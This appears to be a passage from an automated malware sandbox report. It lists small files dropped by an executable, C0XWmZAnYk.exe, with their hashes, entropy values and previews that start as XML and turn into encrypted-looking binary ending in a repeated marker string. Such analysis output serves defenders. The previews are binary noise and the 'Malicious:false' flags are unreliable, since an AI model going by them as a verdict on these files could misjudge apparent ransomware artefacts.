              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.690943556191613
              Encrypted:false
              SSDEEP:12:PrIuZ7i14CBf41TKHuHJToMULJivp3AhBPprH3sSGO3+OjirCeAmz0dxa3cii9a:PrlOPHH5MULJiR3EBPpH3Tira80d+bD
              MD5:0CB9EE306B6A87D61BA3656EDC1C0470
              SHA1:8E4DFDB89562A5E349838D8083A49F30CF0BDA71
              SHA-256:773A4A23008212F888B2D57C489E1019AF3D49CECAC8D342536ECF6A34B86527
              SHA-512:07754A1ADA47B3F4FE3B30A5CF31FB7FB8CAB8F5DB29DB75FCD717F0383BC83444F92F7C050FC4D43F57857C7ED1A8D8B29B1F7F181DA26FACF05394E4841FF7
              Malicious:false
              Preview:<?xml.i=..........;........H..!...w(..T.....P9...5..T..'....+.\T..L'.o.wB..N...1.P.v...L..*m..m,.%......o....A.R.8...ASl.p(..o....#.../(...e.g..I-$..:....nW{,gY...*....(.id.....a+N..@..M.6......5.. p+.}.......f.....G..gP?...8...........@:.G.e?...!........B.N...E......>?.3.Y.h...z..WG..x..[..O..n..h.7.i.....i...>...#...."...V#....8........:..k`...[..$.x...D..^@....9....wjsf...i?V.).J...y2.Q..;."...]f..S.....iVzqB%.Mg.!}.L.O.el..r.?.5.?L^.w...?F-.w...h(. RL...#.g..o...%.x_WO..$...C.F.V....H.._i..e*...d..T...q.........J.7.@..}...v.Y.._.......K..Y:..5K..o...[...I.\....e!J@x..........a.40....%&P..`.8.(Q..H..O...H..C_..U.(...<X(ugigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.72789109437872
              Encrypted:false
              SSDEEP:12:nW1ENHfgoCDWJ/i2ymT1dFdrgkajAYfTqitvKywxR+L83Ew2Ydxa3cii9a:nWcfXCaJXJFSXjV7lWRG8Uw3d+bD
              MD5:65E1B4B52762538A93ABEAED2D06F04C
              SHA1:EC134E4A6C426E0E09D8CB3F86AA897371DE9400
              SHA-256:8F3491FEA3FBD9A3B787334BCBC1B270F549A6AAAA2EF6E56116AE05DDF50549
              SHA-512:112F20E6DA733B44E54988DF59736F9690569ADB45C01C934F63B3614C74DC41B0C5F053602EB06C1AB24A4A0FECA19D9F37215A47BA700C22CE2E5FFA002605
              Malicious:false
              Preview:<?xmlkK..a.O..Y0...d..e.Z...... ...[....{.t.8."*pR....ccz..e...).._..2..H.-...h..< (rvo/6.cj;.LX\\9.&.lj.@E..Wvk..b....8#...5.6.]p@..9:0...Bu.U.B.#].'.cB...U6C.....PW6...4.<(..2..u.6......!n.y}.v.&..B6.6....,Gq..:.tj.......'......-..#./.|#m+n...P....J.....en<.Qt.[....p....+. ....V5...H4]...PJy.t...'.B..Jn.=.r|Z3.7. .EW.>.Z.O....{.].M..Zf...04.gI.~.`(..q...N....O.D.. M.....;,......ED....7.J..c..~...$.B...o0..Z.A..B.:......D.x......_..NR...7r".22.'...g...2f&Y...&.$...oP..%....O.I.U.7|G.i..uWw...R...B@...{...A....g"1...;.clL........H..X.R"%t!.......t....W.7Q'.....)$..5T!C.Y.0.....*...D.v.^....%.`..n...o$.I...7\..=...1......b....2.'...O..T.......Wuk.~.:............rq..;CK.......W.<....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):761
              Entropy (8bit):7.7484729052296375
              Encrypted:false
              SSDEEP:12:4wCKQBrXt3fhdmkD3UWmwhvrWc/bctjtpxQnnqRHPYCxEN/HItydxa3cii9a:Ta3fhuWCcjw3OqpACxEZd+bD
              MD5:E7ADB8BF54E917F7A4FF9742C7D73BA2
              SHA1:BF5C409EF97F2107B2250AC9A5720DFEE5966946
              SHA-256:7C001FA0FBDFF0F76C823C0C4AB1F5B770434B81EA0C03AF30C8417FC2D7C1FA
              SHA-512:15F2E1C372FC500CB06C191D87224D33A52FD34D368BC1C77EF50AAD397A3DED12299FFDBA581C1C517E8219023E89347840AB5FB614D3732DC2E53E9A1C1DBF
              Malicious:false
              Preview:<?xml....[.`@.....1..:.7....B.W.T.d./.@...A~+S.^V6l...u...L....J."(3..nf..I.vg...*]......r..n{.........)\..=.ju]...$.D!.Z..B..........<N7......%.X....n...R.S1c./}mSi^........H...4..V,*._[.m.`..........6M:\2.o9.v..B%!..^i.g..`.?.....5..H...Z._.1!3........R...\3..F.6.....A...M........N.s.mP...#.....zG.r.v......ZK[}..(......<.'.qB...[S..n..]..".<.e...L.^.5.kAU.gjk4.\...d.....A...d..J...q..]..T.2f'.......V.t.b5...F..k....mQ..^3.]....d.k.&T...K$..Y7...p..\.Z/.Z.W.......0..;....).\R...1.b..e.x$.>Z.............{....Z:..J..C.;......Xpdl..S...I,.|...A..1. ...\ro...N..w$...._7..q.q.-i(.|...T....F.RUf.h..K....W.kiX.......L..l.....X.g%....@...8....gz8.R,....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):832
              Entropy (8bit):7.714434329333241
              Encrypted:false
              SSDEEP:24:Vx2pGSIkReClbRWuO4g/1nZ/PpunN7bP2Bd+bD:HcAkRdlbwuO4g/RZHpunN7iL8D
              MD5:ED49CE12ED9126980E94B1E15AA606DA
              SHA1:5E830625C8E6180AD7A2F2008759C3B3F596D960
              SHA-256:1E7AB760443EA24C58C4B20314F87BE17A53106F926E91363F7F4E80C6E65E17
              SHA-512:4941816EE97656D82F21AE40CEF4CEDD812816141E014CF47CD7973B8CFABBAA12DB09326F8A4D5A6894537E2520CE26003AE6A85BF53041F53EBA9FA0C2253D
              Malicious:false
              Preview:<?xml...S..w...K..P9..|.(]N06(......o.*..A ..e..._d..%.=...z....?.|.jl..X...'....v.....b.V._%.3.4....F9..S K...a.T.....C3.K,...S..b.l.R....6.F.bk ..c..o..1..."@.D.kK......Co..<..$.y.. ....m.j.}..'..kO.Pi[.t.....g=..]...a..+...)g/..+9}...^."...m..`...$........6?4...%.q.>Q..Q.z....k9StV........O".1..Z./Nu..Y.......w.g..|$0V.5.)m..9.. .K].]e?..."'.{.bj....DS...p...h!...JA...X...=@...nRlD1...0<..4.q...<E_../x;2~..`.}.....;.X..X.."w.t...Mt.....!O......o...r.v. N.\..........|.<l.~k..Z.e4....oT...a...O._.M..Cl/..;...]V}...-.1B>EL...OL..(.{u..!..l<t............=J.6T..fN...5........'....m9..0.iJ..p...S.H.l( e.H.$F..3....CZ...c....e@R\....>......Grr.cC...66.G.f.m.ZH.>.M.6........io.<tR...9.....9.(.y.7.p$o9.q.25...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.7181821679444385
              Encrypted:false
              SSDEEP:12:v+r9O2fmqI2f0um6OdgTXHprzStlujBws7LXKjLYAsxParbaFgGikyw+Xakzdxan:v+r9OqIb76OST5vOUBdfXALt0pFxz0zy
              MD5:CE5E5BF9C066AA2A1D0E2EC236A0E955
              SHA1:E6B5A8C69186E39D26E74F354B28FAF3C428B205
              SHA-256:72661F93209D16813D22ABBEA4CAB30B5FD12DD2CC687A4EF03232DBD21CB2C5
              SHA-512:06895E983F5DA6F96EE421E90E851558F80467C6A1F34F11838FC13003614AD5E310869B9CF5C920C0ED38BDE6E3C8E41375BF9D0D1B79070D1F7935C6399EB1
              Malicious:false
              Preview:<?xml..^..G.....yT..$.(.....6.....c..w4`u.m...$..2.2).<.).>&.*Rl.h.[.4.g)..-.3p".m.|._."5....3:8EkV/..{tHWP.~..6.K....hfP...........("....;..r*..f...l..o..k.;?...#._jO.%.`W7..<.R8...mT1......5..}?..".L.8`.*.5..;...Q.......KVqC......oB./.0.#I..x...o....>1...U*2......C.O..p.^Z..a..|v.uiW.V.K...v)~.a0.....b.r.=....<...<...Hk}..^I.<..........fV.. ...g:.P.pr6o8@....9+@.z~.3...b.f./.M3..'.Gk......k...h..ez.9p.....b...EKJ....f>....i.......;.M..(.mt..8.....KK..7m.#.....I..o.y......Z.....>..b.O.=..?..0wV..c.L.j.z.....dd..N.J..a.=.r.acX..].|.h(.2.%...&fi..\J.|+/h..^.....>.D.,@E.}..C.?.......M..r....X.....C...qh..1<`...8".5...{.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.735486775998753
              Encrypted:false
              SSDEEP:24:+NMe0xNcyeLZVBaOgolBxq2XdhJLVVXEd+bD:O0xqyeVVOYNtVX68D
              MD5:1150B0F8F684DF67D86D31AAA29743B1
              SHA1:AE8DCF9DC2EB0AD4D467F3B295347291F2EE6413
              SHA-256:322C505D633F84A989046EED5EE4B014C7AF12D3E03401BF2875B6EAE66483EC
              SHA-512:933905FCEE394E941DCCCC7B37E0A265E0385BE2E650EBA18AC8CE38709F8B06110D35560C85D65692813B23FD4C2D710E1A84BF269AE5AC1AB54FD110C4D735
              Malicious:false
              Preview:<?xml.T-.,.jf...P......U..[Z..C.p..tg.%....}.....U..v.\...R..:.I..qX.d2!...wr>(Ja L...N7.c7..U.D..-...2g.{...Cr.A.i.o.V./p:..3.Rf.,.?r.N.j2.}i).)&.\[..L&.S.. &..y....QJ......Y3$M.v1.dO|2../k`..p.0%..BWi...A...+..s-i-...!c..t.....}.U..].H....:Z..z....XYd...F.........[....v.<..nQw......eBd m.3..5.6...l.......bk+!....^.&....../....7/.;.I...R.u.....XQ....T...f0.q3A.Q..^tw.(...........}.+..d..wTL.+M....}.L.mE.M2.{j@.+.o!..%4..F......49sB.h....4.......u.......wLb..Rv.I..C...).H..,.L...D.v[....~.q.'..........THK..I......J.E..'.J.G...}...9h..&..m.*.$"l....Y;.......i.R@..?.`.H.i.Gc.G|4.8.9u..z....~.VA0...W;.:.hW..}..B!..j....q.9....ebt..|V....\*.Wo.......}u.....'...9.}[..Rk(bFgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.726115151832871
              Encrypted:false
              SSDEEP:12:8mDhDQ6M9fnBBuyiGnHWCJ12vk4G4xetapcR2DGM/LLuyoUvyoiKfS0dxa3cii9a:Z9HM9fnBgyiGn2g3r8etapcR2a8uyHqt
              MD5:418CF7301CE02B1747AE093A0FEBE9EA
              SHA1:A81EFE6FA74CC1BE255F38C7D74850A5B714D054
              SHA-256:5209768D7C21415DE5CCF6FE3BD1A23662C62B40ED00590104DC845D8FEC0B5F
              SHA-512:88C195569F5A3128B98F2BDA8B3C2B6A65BA288CC6C690167D1A460748AFCD47C27ADEE62C2DF7AC4CE6D0B40E7EF5E0164F200D1E0FD337A4D392C5C8CF94AA
              Malicious:false
              Preview:<?xmlA..yo.>.6.../4......K.c.aK'aM.c....v.Q..........+. ....@.<n.$z.*#.$r1..t..nlP.z..BU.1.....i|.W..s....&)u.#:,eCx...A...t.n.....3..k..-.l.n....`..#i.V..-.NC..<T...[x5.c-.=C.3rj~.4..?.(....G#W.....qL..;r...\^...f.6.O.._vcal..oI......9..q.h.Z.&..F..6....;..H.>R...(....>...W....=)...\...(..]A...R..d..C..f}..H..nEQ"T..1.dB{......G....}...$.m...F......y......'.8.2..(K.".t..>F........9....k...^A-..@G.'.f..gVB...V....*.H.M"0B....E-W&07.d$....T.....\.<.F.0@5.....i.K.~.....V....5p\t..".2.#..".S....8.M?.|m..wK.5.4S.r.....y.m.I....cl.k..)./..p..... ....).#.....W96...I`l.ixT..F.p...bG.8F.=.s.Vy...>...>t.o|....G....8..n.nk.N;>h..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):827
              Entropy (8bit):7.733147004217179
              Encrypted:false
              SSDEEP:12:6YwqNZxWN6QkDp05MsPdexITdygeZWWyAR74YE+T18KhDmEHRu7TZdxa3cii9a:TxWNL8p0mkdNdygPWy04Awtd+bD
              MD5:CA277795B3454988ACCFE9C5FFC993DB
              SHA1:02BF3FABC48119229061216359A846DD487A46B2
              SHA-256:B89C9F56E36A1654E416695A70EB2DB1CADF338CBE5EB9EB281B4937EE1DD13F
              SHA-512:E112B585962DF2A5A59455D4C17ACE3F22D5C5DB11CD33B9E7C4BF162ECA3C6ADE9CF741B4951624E656FCADF191B2E63A6E0BDBF529A362C22AB24B316ACF7B
              Malicious:false
              Preview:<?xml.p.......y8... ..g..-.Z+.....c..:9|Q..S}*.,.L.....s...h..../....r.M>g.7#.Q.Q..c2.>..;jl.8"Yi:.9....G/.....G9.D..5z=.b..1...5C.7-......"..}.AS..|.4V.i......($)(.9...!........0....}'..!.B...q....b.K.8@..q...m.T.=_.....D.^.Cv.P...q.:..>.......G.Fla....4.L.xiY)..GE[.\.i....rwN..n.hx....cy?.e.r.@...q..k.>t.pk.2}k...3.`.<..H0.+.'......wuP8.....^...2I5..O...a..p..7G....T_MK.w.....P.m_c..]../ 56..A+......!....(y.l19.t.8e.Q.,.-...`....H.......(I.........WQWjoGV.......(..yt....&.G...d....nc.#c...S:....h.f/3.h..$c<.>+.F..@^..T..d.1TY)(..2.H.qh..F.s....9.....}...S..x..N..5W.P4f.Uc.....#._.3...._.Z.....8....?...w...".....R...:M.5..c..T.Su.v^......"...I.R,...9)d..~r.6.<H!.O..FHF.....p.dV.............b...O....JgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):753
              Entropy (8bit):7.660912036487746
              Encrypted:false
              SSDEEP:12:06IphlJKHAepUP0yjBOMm3/hV+w3s6Nhog9vxv1xWGbcUUlKdxa3cii9a:06IpGNpUzouqNFveGgfKd+bD
              MD5:4977F23CD21D351405096F3A216379E9
              SHA1:3FFCC6952747CD56906A8AD475280CD70EB90D2F
              SHA-256:D899337FCF1680D8C6F0656E97BB49800B2F090B67C1CB5C57485B1191C878C4
              SHA-512:33F1F93EBD8A815D76D9C16E34DE76F36C00F46DABC32B000D2CA8D0DCFA4339E25CDDD7743CF1ADA3F0917A14DAE697B5FF2D30E43A3724AAD98A1FA86BADCB
              Malicious:false
              Preview:<?xml4G...&i..!..M..3`.\.v..j.4hV..o1.`{i@6.W...5..:.....9..* ...k...G./....7....$....`.%.V....h.^........yS5.....6[U9.(d.|..1.}Z..I6Z!..."...P....[:...A.gv.;.?6..1f.a...F.u^.r.^.~.;..+F(.1:].5z.U.k...].4f7.2..-n*SW}..&6.......:...P..Z\./E..U....E.,.[.L_2....|P....p.@.Sr.P~...Rn.....0....B.8VCm....H.j.."T.A+.............e.5....@.Wz..&]..{.J....G`...Cf.i.C..I;>..QL...."........I...N...TO..-.R..;....,.K:/.O.M....n......F..eK*.-.p.B.nVP...J...Zo~W=$.....Ss..w).(L7.r......K.:.db{+....Z...*_....p:R....6Z..j.f8..v.O....,n..._<X6.}I.8p..S....;. :0B...\.0.F<..F.o..../.n.d.QY....D..%C.M//..G...1..........a.6.0..)7...............Q...8RIA..(gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.709410639643325
              Encrypted:false
              SSDEEP:24:0hDmo27msG65qA0b+4rv+kZMZvEciId+bD:0127NG65pG+ov+BNn8D
              MD5:EF30CA7C0885CE8437355E30531AF7E9
              SHA1:7962D2A724B9BA5EADF6C7A1AC1BE6019BB77CC3
              SHA-256:3CC0B6202D4AF51971633ED9881594548A5DCA668B3B37AC49B1F4AFBAEE1DC9
              SHA-512:1F63F0A97D356B3788ED9C1F1AA239F688140AF79B25088B4627A0029FD7FA4FB04B4B2C869617352692089C37BF93C12851BE23F9717574C7EA38E5FD9E782A
              Malicious:false
              Preview:<?xmlj,)X.iJa.O....o87......T.u.I .v...^.1.f...[..j. -..2U.x{....'_7....~:.7..E.>..h_.y...Y~..%......Q.K%.....v.L:...S.).N.2..n.E.k..k7..C.pe..6>c.-.#..G~...R.<.*T....,..W...?u.KNU.e.s.U...p.[......\....q.E......._...1...-6....C.M..*.V......f.....(....|Q./.J...@.7o_taZ#:2..+.MI.....$..0A........`..My...B.!B....<.8Y~U.B.XF.....g..It".7m5.N....&.....%/..%{.}C......c..:>Xn.Z....>8..|.up....MA.1.\zs^.....A_\>x.x,i../E........!...%(.2....s.Y.d...3.,...[w....Cu..i<..}.d.?.....x{.g.....F.vNt...Tt....VW.!:.....r.EX*.s..1...&L:R.+,E2Lw.....@T../..bz.r.(L."....K.z..(W..4g|W.&[Hz0..+..P...i...p:...|k.XB....L.N.{..)l.dH..5.%...1...H...c....l....,..\7.<...f).Wk...X1...;7.p..p)....v....[#...ygigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.7044738098803744
              Encrypted:false
              SSDEEP:12:S+mh9Qg06M8Js/8snbUA0BkLBQf6MggCMeM2qSmNZEJaliuzC6KZ4FUrS7ql7dx6:TUQr8SFbaBkLB4BeFmXEGzFC4mpd+bD
              MD5:AFB411814A0D99BC6CA1DC6C58466416
              SHA1:23A454DAFD8E9693FC530E5D51FF5B28592E5C81
              SHA-256:D376C2C09C90B91FEDDE554B91D348223EA2C0DEF793EF4011534A5C6071695F
              SHA-512:1D0E9460EC13A781536FA949616008EEEE19BC81E9B67B5C43B468612867A901541894252373376CC72A2AE0E7EA88B4A81276832BA267C67FDAF37ABCA471D9
              Malicious:false
              Preview:<?xmlO..;...L.T.E..L..'.m}.!..q-..5..l^J.\.o......r.......+.@.H.".x@.^......j..G'.d.m.!..R..<.....\.?.]f=....l..2."..\...&...x..-.4.%^c.fCM.m..01.~.....5.s.'...U.>.y.'I..g.b....mbP*..H(........../S....=..\Fg.$.1.. zF.....7..K.%....E..q.'..iN..(+.#..+ng.X..=\y.Ln9;.<.2...T....n.r'Z..e..Ke_b.....e12.".@,.....;.A.)(...P....S.H......I.|...@..7..-F..Q..>j?..U.rj.........._..m.....n.~(.tC5...Jk.##?.M.*.jo-.......XI..S..3.....BID...<......qKQ.@"...9.N..>\.|!\.|.vV..!/,(...pD..F.c.h.u..v.h..<..v.K56...<.......9.`]IX..s...Kf}W...:.Nm...-.....R.F.. i K...2.4.3..g...Nu..t.;.'..*..$...{Q.a.IT.h.$RS}.z...S/.FW.7GS=vv5.i...##../..2.......(k.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.721193754384385
              Encrypted:false
              SSDEEP:24:gfUBIn0Bvue7THNBA8QPzF/rekyKejd+bD:kDnCNB5Sd7eJ8D
              MD5:741AB558372426766C7CE7D63F3DF1E6
              SHA1:9BEA893C583AD6D1C394587EFFDA400C55322BFB
              SHA-256:6981769664CD76BE3B32987BDD6E9C3055335F451C5A1204ADC67D389EA34A78
              SHA-512:71AEE827D2A0F8D85EF26DCA3C8D308D225B7E0A7B0086C70A61C3D44BBB8159CB6B780EC397CD1E4761F75D625DDC7AE52AA71CF0455D0BCC470E31875FC08C
              Malicious:false
              Preview:<?xmli.5.i51./6..o\.....pF..7kB.O....#9.`.2.{AeA.(^C}..5.q.z!.v.b8`:...S.9`...;..$......r.0.....9. %x..v.....i.m..C)..[...>...Z.(.m!.......7....;....+..y>....n1v.W...e....y..W.....H.........6X?.GN.9.l.....i.h...=.c.....t............(....}d...&>6........r+Z5g....F9^.......T.}.w.Y.)%.o8..n.....5.QG....a~w?.....)...u..y4.!.t..._...VE.....Dj...J%.....]."..*.)....k.q.f>.0..@......n9x...v.Ac'..X8x.....w..p.H.DoI..y.P...^[.y..........-.y.;..qq.)F..}.L.!.4..4...".pw '9.%...6....o...d..,..]..........n...S8...e.1.I...nS ....vE5n...iQ2N..j...+....V.....9U.1....9...K...(..3.j....=...<,.L...<.s....>.. 5.b.x.....q...1..9y......_.w.h......B$K.~...(.-C7..o&..5.s,z.j.N..WYQ].M}.|..^...s.X.-%.l...y2...9.dgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):756
              Entropy (8bit):7.716480223934569
              Encrypted:false
              SSDEEP:12:IL61eVe9BlAeUjuWfl5V257/JaCOTkkmzHlyh3bPvKJibob8hWOMGtXHnqdyrF2r:IL6PB2jpT85zOYHch3bxUwlRqdyJ2VCy
              MD5:B3A31A4DC4111E15312845F8DA683870
              SHA1:E481CD31A5F6D674158CD7607B56AD7279F3AF3D
              SHA-256:630CACBE96FBC340246786C3BF8BFC3CD1D61D95E31585835183E6D2981D2B33
              SHA-512:1002A3AE85DED19CE6B6296DE0DC3FCCC4E4AE25606F481E7DFD5F335B387E17C129B0313F9F5BB7B918C8DAC7FA4DD851111467B2DFA093B2E390F6E5F042D8
              Malicious:false
              Preview:<?xml5.#.'.y.L..TU.f.f?..=.7..Y.....X.).,......O.....+...Yk...l...........,.2..V....Z...E...z.s.s!/....J..<d...-.I.3...CH.J4...B..v..J....)........'.u^...K...Cm...!|...R.>rc<.p...I..|.U..7...;..U.../l..xB...@...S..b.u...cKz.p.7....m..S.."'.....z.L.....#...".....+.TD....H..C..Pe.Cq.HF..(.....K8..~h.........N...c.....Z..7.YNw$.....O..cCuj;=.{.4...C^^.[...K6n..U......0[.hos.....0..4..W. ..AHg..2..d^.h..'=.S.f_.b..K........(..n...[...@5J.O...{e..%...Ds..P..mj4[.g|-S....F.y.i.0......u...y.3.3.m.1..}....9.h...H2.G..+S..........K.Y ...1.7.n_..K...R.*...Q.h.Ap~........y...._a....}.P x..\n.....{.....I.._=0/.{2.....:W...?W....v..SV..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):811
              Entropy (8bit):7.700676505920528
              Encrypted:false
              SSDEEP:24:TUIe8ZANtCYZ0/3eg6OFiJwWfselnl3gIkblEzGzyd+bD:TZ5qtCYsRFillZgIE08D
              MD5:3AC50C51F21186B8997370514FEC9E1A
              SHA1:591160D9E5AFD66D59235F7E350DA431AA6FF2B8
              SHA-256:2AAF48D12E079C19A6789D11B3B1684E723A2AE2ADFC168FE0402DF75ED2F13F
              SHA-512:8929E9BE261527A6401987E9FEC2DDCFF4608B0B66AA3D1BB6231BBAD88729B36810C9C255A279396B66B221E5F4042B97B727D3C5D9B291E2A19E74DE352FD8
              Malicious:false
              Preview:<?xml*z...K.G<.*......Y*..Z..f...J[....\.....rj..G..|kQ"f......:.i..{..t,l7.n}.Slr-.....Veyy..R...P..T..(....5.G.,.}.f;.e...#....?4{0j.y.z...*t*.+M..,.X.......zL=Hy/P.......~....|..x.NX9B.l=..-D.................x..n._.!_..I.........iM.*..4.!M]...1.....F...9.0..U-:....G....rq..s........u.(.pH..C...w=... @/...KI.>.Et....o-D.G....[..@^.u..O....91....q."..~............2_..t.k......X.*L.9.l20..G..y:......4...=.....9......E.yS.#.n.48=.~...l.-]2..5..p...%.........L.\.._......D5....b.[.'.....p.r ....m..."EF.v,Y.u1..-Z..?.*.]Pkj...?q...z....t........b......\-2/.hw......)......1...lg....m..}L...@...d..;8.W.8T.....!....!._.&..^...$......5#.:.v...`.Sr2(.)j...8e.0.D.*..)..l.h...."*|.k*J..B..L=n...!XkX..~...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.717497885170077
              Encrypted:false
              SSDEEP:12:RkfI47EaNN4Bcu3vnNjoCB4z4qUo/3KHpLy37CaYhrbyKdxa3cii9a:6fH7ETmGeCBdq9Mp238hrFd+bD
              MD5:9E5F6A064DF119A87BB90CFDE0AF29DA
              SHA1:60A1E84808A48D2381BADF23769AD293D9E4E3FC
              SHA-256:668B4821DFCCF52C7A61C698B1F50052275069FAF33C943A96BB8A3563AA8E00
              SHA-512:5A92A2FD15D42E78103C4D8F7A57389E1C66B81F628334453D33A0D1E129B10B1EFE168644C4D1C3000430952671F1BECB3583116D3FC1BE2292BD20DC8BF06F
              Malicious:false
              Preview:<?xmlR.@.t..W.'...F..H'...h.i. ..G...T.B.iY....i..J@..._.)L..9..l}..=.x...G.1A(&.,...q.+.f.Zkb..-..].......=...IW7&N.qn...._V.2....FI.....&'.E....9.AZ..G.!..e..kb~N...aP...HA.*>U..La}..N............f.W..%.x.zR'.h.^...O.E+..q...'.....d..9y..Eg...!...y.SoN..[0Jd..(.(03$+OY...7V.i.\..I(2...f.."....p........P.~.1.S.x(Vv.JG...t.O$.u._..=.e[....Z|..G...D9d.W..;.$._..F=..S{...%qZ3|......_.h....Di..^>u.#.Z;.+.}..kL8..$....).....$.........4u...1.U.s...Y"......=6...Q. .v.....=p...2/....{.D*...B.j.#..k.L:.y...p9.<M.w......C...^m.?)...].tOg.Pk...l.R..u.....<Kq'#.Z..R.fk.7EI[.1V..]DzU.T....s...3`.....'."`P].F.-. .w9.s..w~4....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.702451736104016
              Encrypted:false
              SSDEEP:24:BzttrHDRt9QjnAALmhMt0yPQt/h2CfPEold+bD:lrtbAgMtojt8D
              MD5:80A15FEEA53160D70AB36D9441F522B3
              SHA1:AD881685347F2D40ECC51C0D5683A2225D4C5399
              SHA-256:CDBCE7AC19ED3CACFA66A30C074E610CBA22D1BD29E8C22B0E3562B2F837C750
              SHA-512:3D5DFBDE646E58B1D9CDE36940B1E310B094C0501CC01332F54522CBC86F048C115555E16C54B7D3A1DEA9974CFF7AB2C3663BA3BF73BED80DD41711E4B86340
              Malicious:false
              Preview:<?xml.)d...*!v.N...ql......w...gK...L..A....~........n.J.p.~..l....4<.|.T.'.$.[lU..|.!.'.....~~......G.p......>.X.1...F..*...1b;.y..S.=...[/...[...\.<..b8.Z..0...L!...n.f.".B..\v..4q..g.!.!S.t...sp.|Q..\wcS..~.B2...@>7e(.M....9.N..r.Q..o..r..je..<...N.....U.m......F.u.U.....5.q...3.g..P....C..j....n......8*&2pa..p....e.....72......;.*...A.X.l..]O.....<D[..e.u.Rq.....>..:..u......).....//...V...I...]......"B.g0x.......C......yz.......l..0R .[`+H..h..\.i/=.....E..r....r..L.......<r.s.....o.f.=.....e0K....j.<p....$.~= ..=..Ju.fa....9t.u..e..........V\..DO6....+...|..4.Ru%....8_I...A..L..s.].y.S..Kj.t8.S\....O1..r....-.w....}.r. ...$.....P}(...?.Q..+..\wk..0?......jT...;.......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):733
              Entropy (8bit):7.710176873550576
              Encrypted:false
              SSDEEP:12:JD5wgGoe9SP/fA9E0KnpNQKlbrt+0isgSsn7e6AqP4hfuT3dxa3cii9a:JDWoLP/iE08p9YBsZo7gfuT3d+bD
              MD5:05BF383832D2C826066A155D9069E755
              SHA1:11B61EEBD73673012A05B793905FE8FD4D696F1F
              SHA-256:0193CCB8D52E676A516EAB6835306DB2FDE249DF128FD5C8731A0CBDD8FA833A
              SHA-512:9CF61894E505824F34EB3A027E891E9FFDE2D048AE111412EC92DB20B8B6563E6FA7A42CA400A2A8962C67F9BC2CF1BB9742C20B6892D94B79A1539F78E91428
              Malicious:false
